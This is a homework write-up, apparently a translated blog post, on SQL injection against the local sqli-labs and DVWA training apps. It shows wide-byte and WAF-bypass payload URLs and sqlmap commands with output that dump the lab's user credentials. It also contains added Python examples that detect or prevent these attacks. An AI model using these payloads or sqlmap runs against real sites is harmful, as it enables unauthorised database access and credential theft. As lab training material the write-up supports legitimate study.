Homework, 2020-02-11

Wide-byte injection

Level 32 (Less-32)

When we enter the injection string: http://localhost/sqli-labs-master/Less-32/?id=1'

we find that the single quote has been escaped with a backslash, so the quote can no longer close the SQL string. We therefore use %df to swallow the backslash.

The reason: urlencode(\') = %5c%27. If we put %df in front of %5c%27, the pair %df%5c is read as a single two-byte character, so %27, the single quote, is left standing on its own:

http://localhost/sqli-labs-master/Less-32/?id=1%df%27%20%20and%201=1%20--%20
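As an added example (not part of the original homework; the helper names `naive_addslashes`, `decode_as` and `charset_aware_escape` are mine), the following Python simulates what happens to the escaped bytes described above: a byte-level escape is applied, and the result is then read the way a GBK connection versus a UTF-8 connection would read it. The last function shows the defensive counterpart, decoding strictly in the connection charset before escaping.

```python
# Added example, not from the original homework: why a byte-level escape can
# be undone by prepending %df when the database decodes the query as GBK.
from typing import Final


def naive_addslashes(raw: bytes) -> bytes:
    """Escape quotes and backslashes byte by byte, in the style of PHP's
    addslashes(), with no knowledge of the character set in use."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C):  # ' " and backslash
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def decode_as(charset: str, raw: bytes) -> str:
    """Decode the escaped bytes the way a server speaking `charset` would."""
    return raw.decode(charset, errors="replace")


def charset_aware_escape(raw: bytes, charset: str) -> bytes:
    """Defensive variant: decode strictly in the connection charset first,
    escape at character level, then re-encode. Invalid byte sequences are
    rejected rather than forwarded to the database."""
    try:
        text = raw.decode(charset)
    except UnicodeDecodeError as exc:
        raise ValueError(f"input is not valid {charset}") from exc
    escaped = text.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
    return escaped.encode(charset)


# Constructed sample: the decoded form of ?id=1%df%27 from the write-up.
ATTACK_INPUT: Final = b"1\xdf'"

if __name__ == "__main__":
    escaped = naive_addslashes(ATTACK_INPUT)  # bytes 31 df 5c 27
    print("escaped bytes:", escaped)
    # Under GBK, df 5c forms one two-byte character, so the quote stands alone.
    print("read as GBK  :", repr(decode_as("gbk", escaped)))
    # Under UTF-8 the backslash still sits directly before the quote.
    print("read as UTF-8:", repr(decode_as("utf-8", escaped)))
    try:
        charset_aware_escape(ATTACK_INPUT, "gbk")
    except ValueError as err:
        print("strict decode:", err)
    # A well-formed GBK string keeps its escape after re-encoding
    # (the sample text "1中'" is constructed for this demo).
    print(charset_aware_escape("1中'".encode("gbk"), "gbk"))
```

The takeaway for the defender is that escaping must happen in the same character set the connection uses (or, better, the value should be bound as a query parameter), because an escaper that sees only bytes cannot know that 0xdf wants to absorb the following 0x5c.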

WAF bypass

Level 31 (Less-31)

When we enter: localhost/sqli-labs-master/Less-31/login.php?id=1"

the page comes back with the "you are under attack" styling, which shows that the double quote is caught by a WAF. So we try HTTP parameter pollution to get past it.

Give id a value it does not have, for example a very large one: http://localhost/sqli-labs-master/Less-31/login.php?id=11111111

Just as planned, the attack page is not returned. Next we append a second id parameter carrying the payload so that it overrides the earlier id value:

http://localhost/sqli-labs-master/Less-31/login.php?id=11111111&id=1%22)%20and%201=1%20--%20-

This successfully bypasses the WAF.

Level 28 (Less-28)

When we try to inject: http://localhost/sqli-labs-master/Less-28/?id=1%27)%20and%201=1%20--%20-

the returned page shows that the spaces and dashes are gone, meaning the WAF deletes them, so we need substitutes for those characters: a space can be replaced with %0a, and the trailing comment can be rewritten as and '1' = '1

http://localhost/sqli-labs-master/Less-28/?id=1%27)%0Aand%0A1=1%0Aand%0A(%271%27)=(%271

Now we can modify the first 1=1 to carry out the injection.

Entering union select 1,2,3 shows that union and select are also blocked by the WAF:

http://localhost/sqli-labs-master/Less-28/?id=1%27)%0Aand%0Aunion%0Aselect%0A1,2,3%0Aand%0A(%271%27)=(%271

But if we put arbitrary letters between union and select, the WAF no longer blocks it.

So we can write it like this to bypass it:

http://localhost/sqli-labs-master/Less-28/?id=1%27)%0Aunion%0Aall%0Aselect%0A1,2,3%0Aand%0A(%271%27)=(%271
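An added example, not from the original write-up, looking at the Less-31 and Less-28 tricks above from the defender's side: a request pre-check that URL-decodes the query string, flags duplicated parameters, collapses whitespace such as %0a, and only then looks for keywords. The function names, the patterns and the benign sample URL are my own; the two attack URLs are the ones quoted in this write-up.

```python
# Added example, not from the original homework: inspect a request the way
# a normalizing filter would, as opposed to matching literal strings in the
# raw URL. Names and the benign sample URL are constructed for this demo.
import re
from urllib.parse import parse_qsl, urlsplit

# Keyword patterns applied after decoding and whitespace normalization.
# The first tolerates words between UNION and SELECT (e.g. UNION ALL SELECT).
KEYWORD_PATTERNS = [
    re.compile(r"\bunion\b(?:\s+\w+)*\s+select\b", re.I),
    re.compile(r"\band\b\s+\S+\s*=\s*\S+", re.I),
]

# URLs quoted in the write-up (Less-28 with %0a, Less-31 with a duplicated id)
# plus one constructed benign request.
LESS28_URL = ("http://localhost/sqli-labs-master/Less-28/?id=1%27)%0Aunion%0Aall"
              "%0Aselect%0A1,2,3%0Aand%0A(%271%27)=(%271")
LESS31_URL = ("http://localhost/sqli-labs-master/Less-31/login.php?id=11111111"
              "&id=1%22)%20and%201=1%20--%20-")
BENIGN_URL = "http://localhost/sqli-labs-master/Less-28/?id=1"


def naive_filter(url: str) -> bool:
    """The brittle check the lab's WAF resembles: literal substrings in the
    raw, still URL-encoded request."""
    lower = url.lower()
    return "union select" in lower or " and " in lower or "--" in lower


def normalize(value: str) -> str:
    """Collapse every whitespace character (newline from %0a included) to one space."""
    return re.sub(r"\s+", " ", value).strip()


def inspect_url(url: str) -> dict:
    """Return duplicated parameter names and keyword hits for a URL, after
    decoding each value and normalizing its whitespace."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    findings = {"duplicate_params": [], "keyword_hits": []}
    seen = set()
    for name, value in pairs:
        if name in seen and name not in findings["duplicate_params"]:
            findings["duplicate_params"].append(name)
        seen.add(name)
        norm = normalize(value)
        for pat in KEYWORD_PATTERNS:
            if pat.search(norm):
                findings["keyword_hits"].append((name, norm))
                break
    findings["suspicious"] = bool(findings["duplicate_params"] or findings["keyword_hits"])
    return findings


if __name__ == "__main__":
    for label, url in (("Less-28", LESS28_URL), ("Less-31", LESS31_URL), ("benign", BENIGN_URL)):
        print(label, "naive filter:", naive_filter(url), "normalized:", inspect_url(url))
```

`naive_filter` misses the Less-28 request entirely because the separators are newlines rather than spaces, while the decoded-and-normalized check reports it, and the Less-31 request is reported for carrying `id` twice before any keyword is considered. A normalizing check of this kind is only a detection aid; the code that builds the query has to use parameterized statements for the injection to actually be removed.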

Using sqlmap

Level 1 (Less-1)

In cmd, run: python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1

Note that this has to be run from the sqlmap directory.

Result:

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.7.15#dev}
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:32:36 /2020-02-11/

[19:32:38] [INFO] testing connection to the target URL
[19:32:39] [INFO] checking if the target is protected by some kind of WAF/IPS
[19:32:40] [INFO] testing if the target URL content is stable
[19:32:41] [INFO] target URL content is stable
[19:32:41] [INFO] testing if GET parameter 'id' is dynamic
[19:32:42] [INFO] GET parameter 'id' appears to be dynamic
[19:32:43] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[19:32:44] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[19:32:44] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[19:32:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:32:59] [WARNING] reflective value(s) found and filtering out
[19:33:03] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[19:33:03] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[19:33:04] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[19:33:05] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[19:33:06] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[19:33:07] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[19:33:08] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[19:33:09] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[19:33:10] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[19:33:10] [INFO] testing 'MySQL inline queries'
[19:33:11] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[19:33:11] [WARNING] time-based comparison requires larger statistical model, please wait........ (done)
[19:33:20] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:33:21] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[19:33:22] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[19:36:03] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[19:36:03] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[19:36:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[19:36:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[19:36:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[19:36:21] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[19:36:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:36:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[19:36:23] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[19:36:27] [INFO] target URL appears to have 3 columns in query
[19:36:35] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 53 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 8415=8415 AND 'iMVG'='iMVG

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 4779 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT (ELT(4779=4779,1))),0x7170717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'uAVp'='uAVp

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 6954 FROM (SELECT(SLEEP(5)))BnDL) AND 'sgEP'='sgEP

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-6695' UNION ALL SELECT NULL,NULL,CONCAT(0x71706b6a71,0x676b79505365574c6368536a457368766a735366766c6f59626b7667415574455351424c444a4d51,0x7170717a71)-- zdhe
---
[19:36:36] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[19:36:36] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\localhost'
[19:36:36] [WARNING] you haven't updated sqlmap for more than 215 days!!!

[*] ending @ 19:36:36 /2020-02-11/
 

List the current database (option --current-db): python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-db

Result:
[19:43:21] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[19:43:21] [INFO] fetching current database
current database: 'security'
[19:43:22] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\localhost'
[19:43:22] [WARNING] you haven't updated sqlmap for more than 215 days!!!

List all tables in the security database: python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security --tables

Result:

[19:57:00] [INFO] fetching tables for database: 'security'
[19:57:01] [INFO] used SQL query returns 4 entries
[19:57:02] [INFO] retrieved: 'emails'
[19:57:03] [INFO] retrieved: 'referers'
[19:57:04] [INFO] retrieved: 'uagents'
[19:57:05] [INFO] retrieved: 'users'
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

List the columns of the users table: python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security -T users --columns

Result:

[19:58:21] [INFO] fetching columns for table 'users' in database 'security'
[19:58:22] [INFO] used SQL query returns 3 entries
[19:58:23] [INFO] retrieved: 'id','int(3)'
[19:58:24] [INFO] retrieved: 'username','varchar(20)'
[19:58:25] [INFO] retrieved: 'password','varchar(20)'
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

Dump username and password: python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security -T users -C username,password --dump

Result:

[19:59:54] [INFO] fetching entries of column(s) 'password, username' for table 'users' in database 'security'
[19:59:55] [INFO] used SQL query returns 15 entries
[19:59:56] [INFO] retrieved: 'Dumb','Dumb'
[19:59:57] [INFO] retrieved: 'I-kill-you','Angelina'
[19:59:58] [INFO] retrieved: 'p@ssword','Dummy'
[19:59:59] [INFO] retrieved: 'crappy','secure'
[20:00:00] [INFO] retrieved: 'stupidity','stupid'
[20:00:01] [INFO] retrieved: 'genious','superman'
[20:00:02] [INFO] retrieved: 'mob!le','batman'
[20:00:03] [INFO] retrieved: '123','admin'
[20:00:04] [INFO] retrieved: 'admin1','admin1'
[20:00:05] [INFO] retrieved: 'admin2','admin2'
[20:00:06] [INFO] retrieved: 'admin3','admin3'
[20:00:07] [INFO] retrieved: 'dumbo','dhakkan'
[20:00:08] [INFO] retrieved: 'admin4','admin4'
[20:00:09] [INFO] retrieved: '123123','admin' -- '
[20:00:10] [INFO] retrieved: '123123','admin -- '
Database: security
Table: users
[15 entries]
+------------+------------+
| username   | password   |
+------------+------------+
| Dumb       | Dumb       |
| Angelina   | I-kill-you |
| Dummy      | p@ssword   |
| secure     | crappy     |
| stupid     | stupidity  |
| superman   | genious    |
| batman     | mob!le     |
| admin      | 123        |
| admin1     | admin1     |
| admin2     | admin2     |
| admin3     | admin3     |
| dhakkan    | dumbo      |
| admin4     | admin4     |
| admin' --  | 123123     |
| admin --   | 123123     |
+------------+------------+

Testing with DVWA

Set the security level to low and open the SQL Injection page.

Follow the same steps as before to specify the URL, but with DVWA the URL cannot simply be handed to sqlmap; the session cookie has to be specified as well.

Capture the request with Burp Suite to obtain the cookie.

python sqlmap.py -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=fumpna387v7b35fhcpo4u5vid4"

Result:

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.3.7.15#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:16:25 /2020-02-11/

[20:16:26] [INFO] resuming back-end DBMS 'mysql'
[20:16:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 4771=4771#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 9013 FROM(SELECT COUNT(*),CONCAT(0x716b6a6271,(SELECT (ELT(9013=9013,1))),0x7178627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XRCb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 6809 FROM (SELECT(SLEEP(5)))APvg)-- Sgqb&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x716b6a6271,0x6154574d745946724c6b635871695750557553626a487647486f4c636e474f6b497470734b4e5a51,0x7178627a71),NULL#&Submit=Submit
---
[20:16:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[20:16:26] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\localhost'
[20:16:26] [WARNING] you haven't updated sqlmap for more than 216 days!!!

[*] ending @ 20:16:26 /2020-02-11/

List the current database: python sqlmap.py -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=fumpna387v7b35fhcpo4u5vid4" --current-db

[20:20:12] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[20:20:12] [INFO] fetching current database
current database: 'dvwa'
[20:20:12] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\localhost'
[20:20:12] [WARNING] you haven't updated sqlmap for more than 216 days!!!

The remaining steps are the same as above.

Bypassing a WAF with sqlmap

Level 21 (Less-21)

Run the test (with cookie): python sqlmap.py -u "http://localhost/sqli-labs-master/Less-21/index.php" --cookie "PHPSESSID=fumpna387v7b35fhcpo4u5vid4"

No injection point is found, so we need to try a tamper script to get through (here the base64 encoding script).

Test the current database directly: python sqlmap.py -u "http://localhost/sqli-labs-master/Less-21/index.php" --cookie "uname=admin" -p uname --tamper "base64encode" --level 5 --dbms mysql --current-db

---
[20:51:54] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[20:51:54] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[20:51:54] [INFO] fetching current database
current database: 'security'
[20:51:55] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\localhost'
[20:51:55] [WARNING] you haven't updated sqlmap for more than 216 days!!!

Test tables: python sqlmap.py -u "http://localhost/sqli-labs-master/Less-21/index.php" --cookie "uname=admin" -p uname --tamper "base64encode" --level 5 --dbms mysql -D security --tables

Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

Test columns: python sqlmap.py -u "http://localhost/sqli-labs-master/Less-21/index.php" --cookie "uname=admin" -p uname --tamper "base64encode" --level 5 --dbms mysql -D security -T users --columns

Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

View the data: python sqlmap.py -u "http://localhost/sqli-labs-master/Less-21/index.php" --cookie "uname=admin" -p uname --tamper "base64encode" --level 5 --dbms mysql -D security -T users -C username,password --dump

Database: security
Table: users
[15 entries]
+------------+------------+
| username   | password   |
+------------+------------+
| Dumb       | Dumb       |
| Angelina   | I-kill-you |
| Dummy      | p@ssword   |
| secure     | crappy     |
| stupid     | stupidity  |
| superman   | genious    |
| batman     | mob!le     |
| admin      | 123        |
| admin1     | admin1     |
| admin2     | admin2     |
| admin3     | admin3     |
| dhakkan    | dumbo      |
| admin4     | admin4     |
| admin' --  | 123123     |
| admin --   | 123123     |
+------------+------------+
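An added example, not from the original homework, for the operator on the receiving end of the sqlmap runs above (the Less-1 and DVWA sessions and the Less-21 run with --tamper base64encode): a small access-log scanner that looks for the payload shapes visible in sqlmap's own output (the `AND n=n` tautology, `SLEEP(n)`, `UNION ALL SELECT NULL`, `INFORMATION_SCHEMA` lookups) and for sqlmap's default User-Agent, and that base64-decodes cookie values before matching so the tamper script does not hide the payload. The log lines, the log format with a trailing cookie field, the IPs and the User-Agent strings are constructed for this example; the signature and function names are mine.

```python
# Added example, not from the original homework: scan web-server access logs
# for sqlmap-style probing. All log lines below are constructed for the demo.
import base64
import binascii
import re
from urllib.parse import unquote

# Patterns drawn from the payload shapes in the sqlmap output quoted above.
SIGNATURES = {
    "boolean_tautology": re.compile(r"\bAND\s+(\d+)=\1\b", re.I),
    "time_based": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "union_null": re.compile(r"\bUNION\s+ALL\s+SELECT\s+NULL\b", re.I),
    "schema_probe": re.compile(r"\bINFORMATION_SCHEMA\.", re.I),
    "sqlmap_ua": re.compile(r"\bsqlmap/\d", re.I),
}

# Combined log format extended with a quoted Cookie request header at the end.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)


def decode_b64_fragments(text: str) -> str:
    """Append the decoded form of every base64-looking token, so a payload
    wrapped by a base64 tamper script is visible to the signatures."""
    extra = []
    for token in re.findall(r"[A-Za-z0-9+/]{12,}={0,2}", text):
        try:
            extra.append(base64.b64decode(token, validate=True).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError):
            continue
    return text + " " + " ".join(extra)


def scan_line(line: str) -> list:
    """Names of the signatures that match one log line (empty if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    haystack = unquote(m["path"]) + " " + m["ua"] + " " + decode_b64_fragments(m["cookie"])
    return [name for name, pat in SIGNATURES.items() if pat.search(haystack)]


def scan_log(lines) -> dict:
    """Distinct signature types seen per client IP; several types from one
    client in a short window is the typical automated-scanner footprint."""
    per_ip = {}
    for line in lines:
        m = LOG_RE.match(line)
        if m and (hits := scan_line(line)):
            per_ip.setdefault(m["ip"], set()).update(hits)
    return {ip: sorted(h) for ip, h in per_ip.items()}


def _line(ip: str, path: str, ua: str, cookie: str = "-") -> str:
    """Build one constructed log line in the format LOG_RE expects."""
    return (f'{ip} - - [11/Feb/2020:19:32:52 +0800] "GET {path} HTTP/1.1" 200 1234 '
            f'"-" "{ua}" "{cookie}"')


SQLMAP_UA = "sqlmap/1.3.7.15#dev (http://sqlmap.org)"  # constructed, default-UA shape
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0)"
# Constructed cookie: the value a base64 tamper script would send.
B64_COOKIE = "uname=" + base64.b64encode(b"admin' AND SLEEP(5)-- -").decode()

SAMPLE_LOG = [
    _line("127.0.0.1", "/sqli-labs-master/Less-1/?id=1%27%20AND%208415%3D8415"
          "%20AND%20%27iMVG%27%3D%27iMVG", SQLMAP_UA),
    _line("127.0.0.1", "/sqli-labs-master/Less-1/?id=1%27%20AND%20(SELECT%206954%20FROM"
          "%20(SELECT(SLEEP(5)))BnDL)%20AND%20%27sgEP%27%3D%27sgEP", SQLMAP_UA),
    _line("127.0.0.1", "/sqli-labs-master/Less-1/?id=-6695%27%20UNION%20ALL%20SELECT"
          "%20NULL,NULL,NULL--%20zdhe", SQLMAP_UA),
    _line("10.0.0.5", "/sqli-labs-master/Less-21/index.php", BROWSER_UA, B64_COOKIE),
    _line("192.168.1.20", "/sqli-labs-master/Less-1/?id=1", BROWSER_UA, "PHPSESSID=abc123"),
]

if __name__ == "__main__":
    for ip, kinds in scan_log(SAMPLE_LOG).items():
        print(ip, kinds)
```

The User-Agent check is the weakest of the signatures, since sqlmap can set an arbitrary one; the payload shapes and the habit of trying several techniques from one client within minutes are what remain visible in the logs, and the cookie decoding step is what keeps the Less-21 style run from passing as an ordinary request.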

Source: blog.csdn.net/he1721360028/article/details/104269793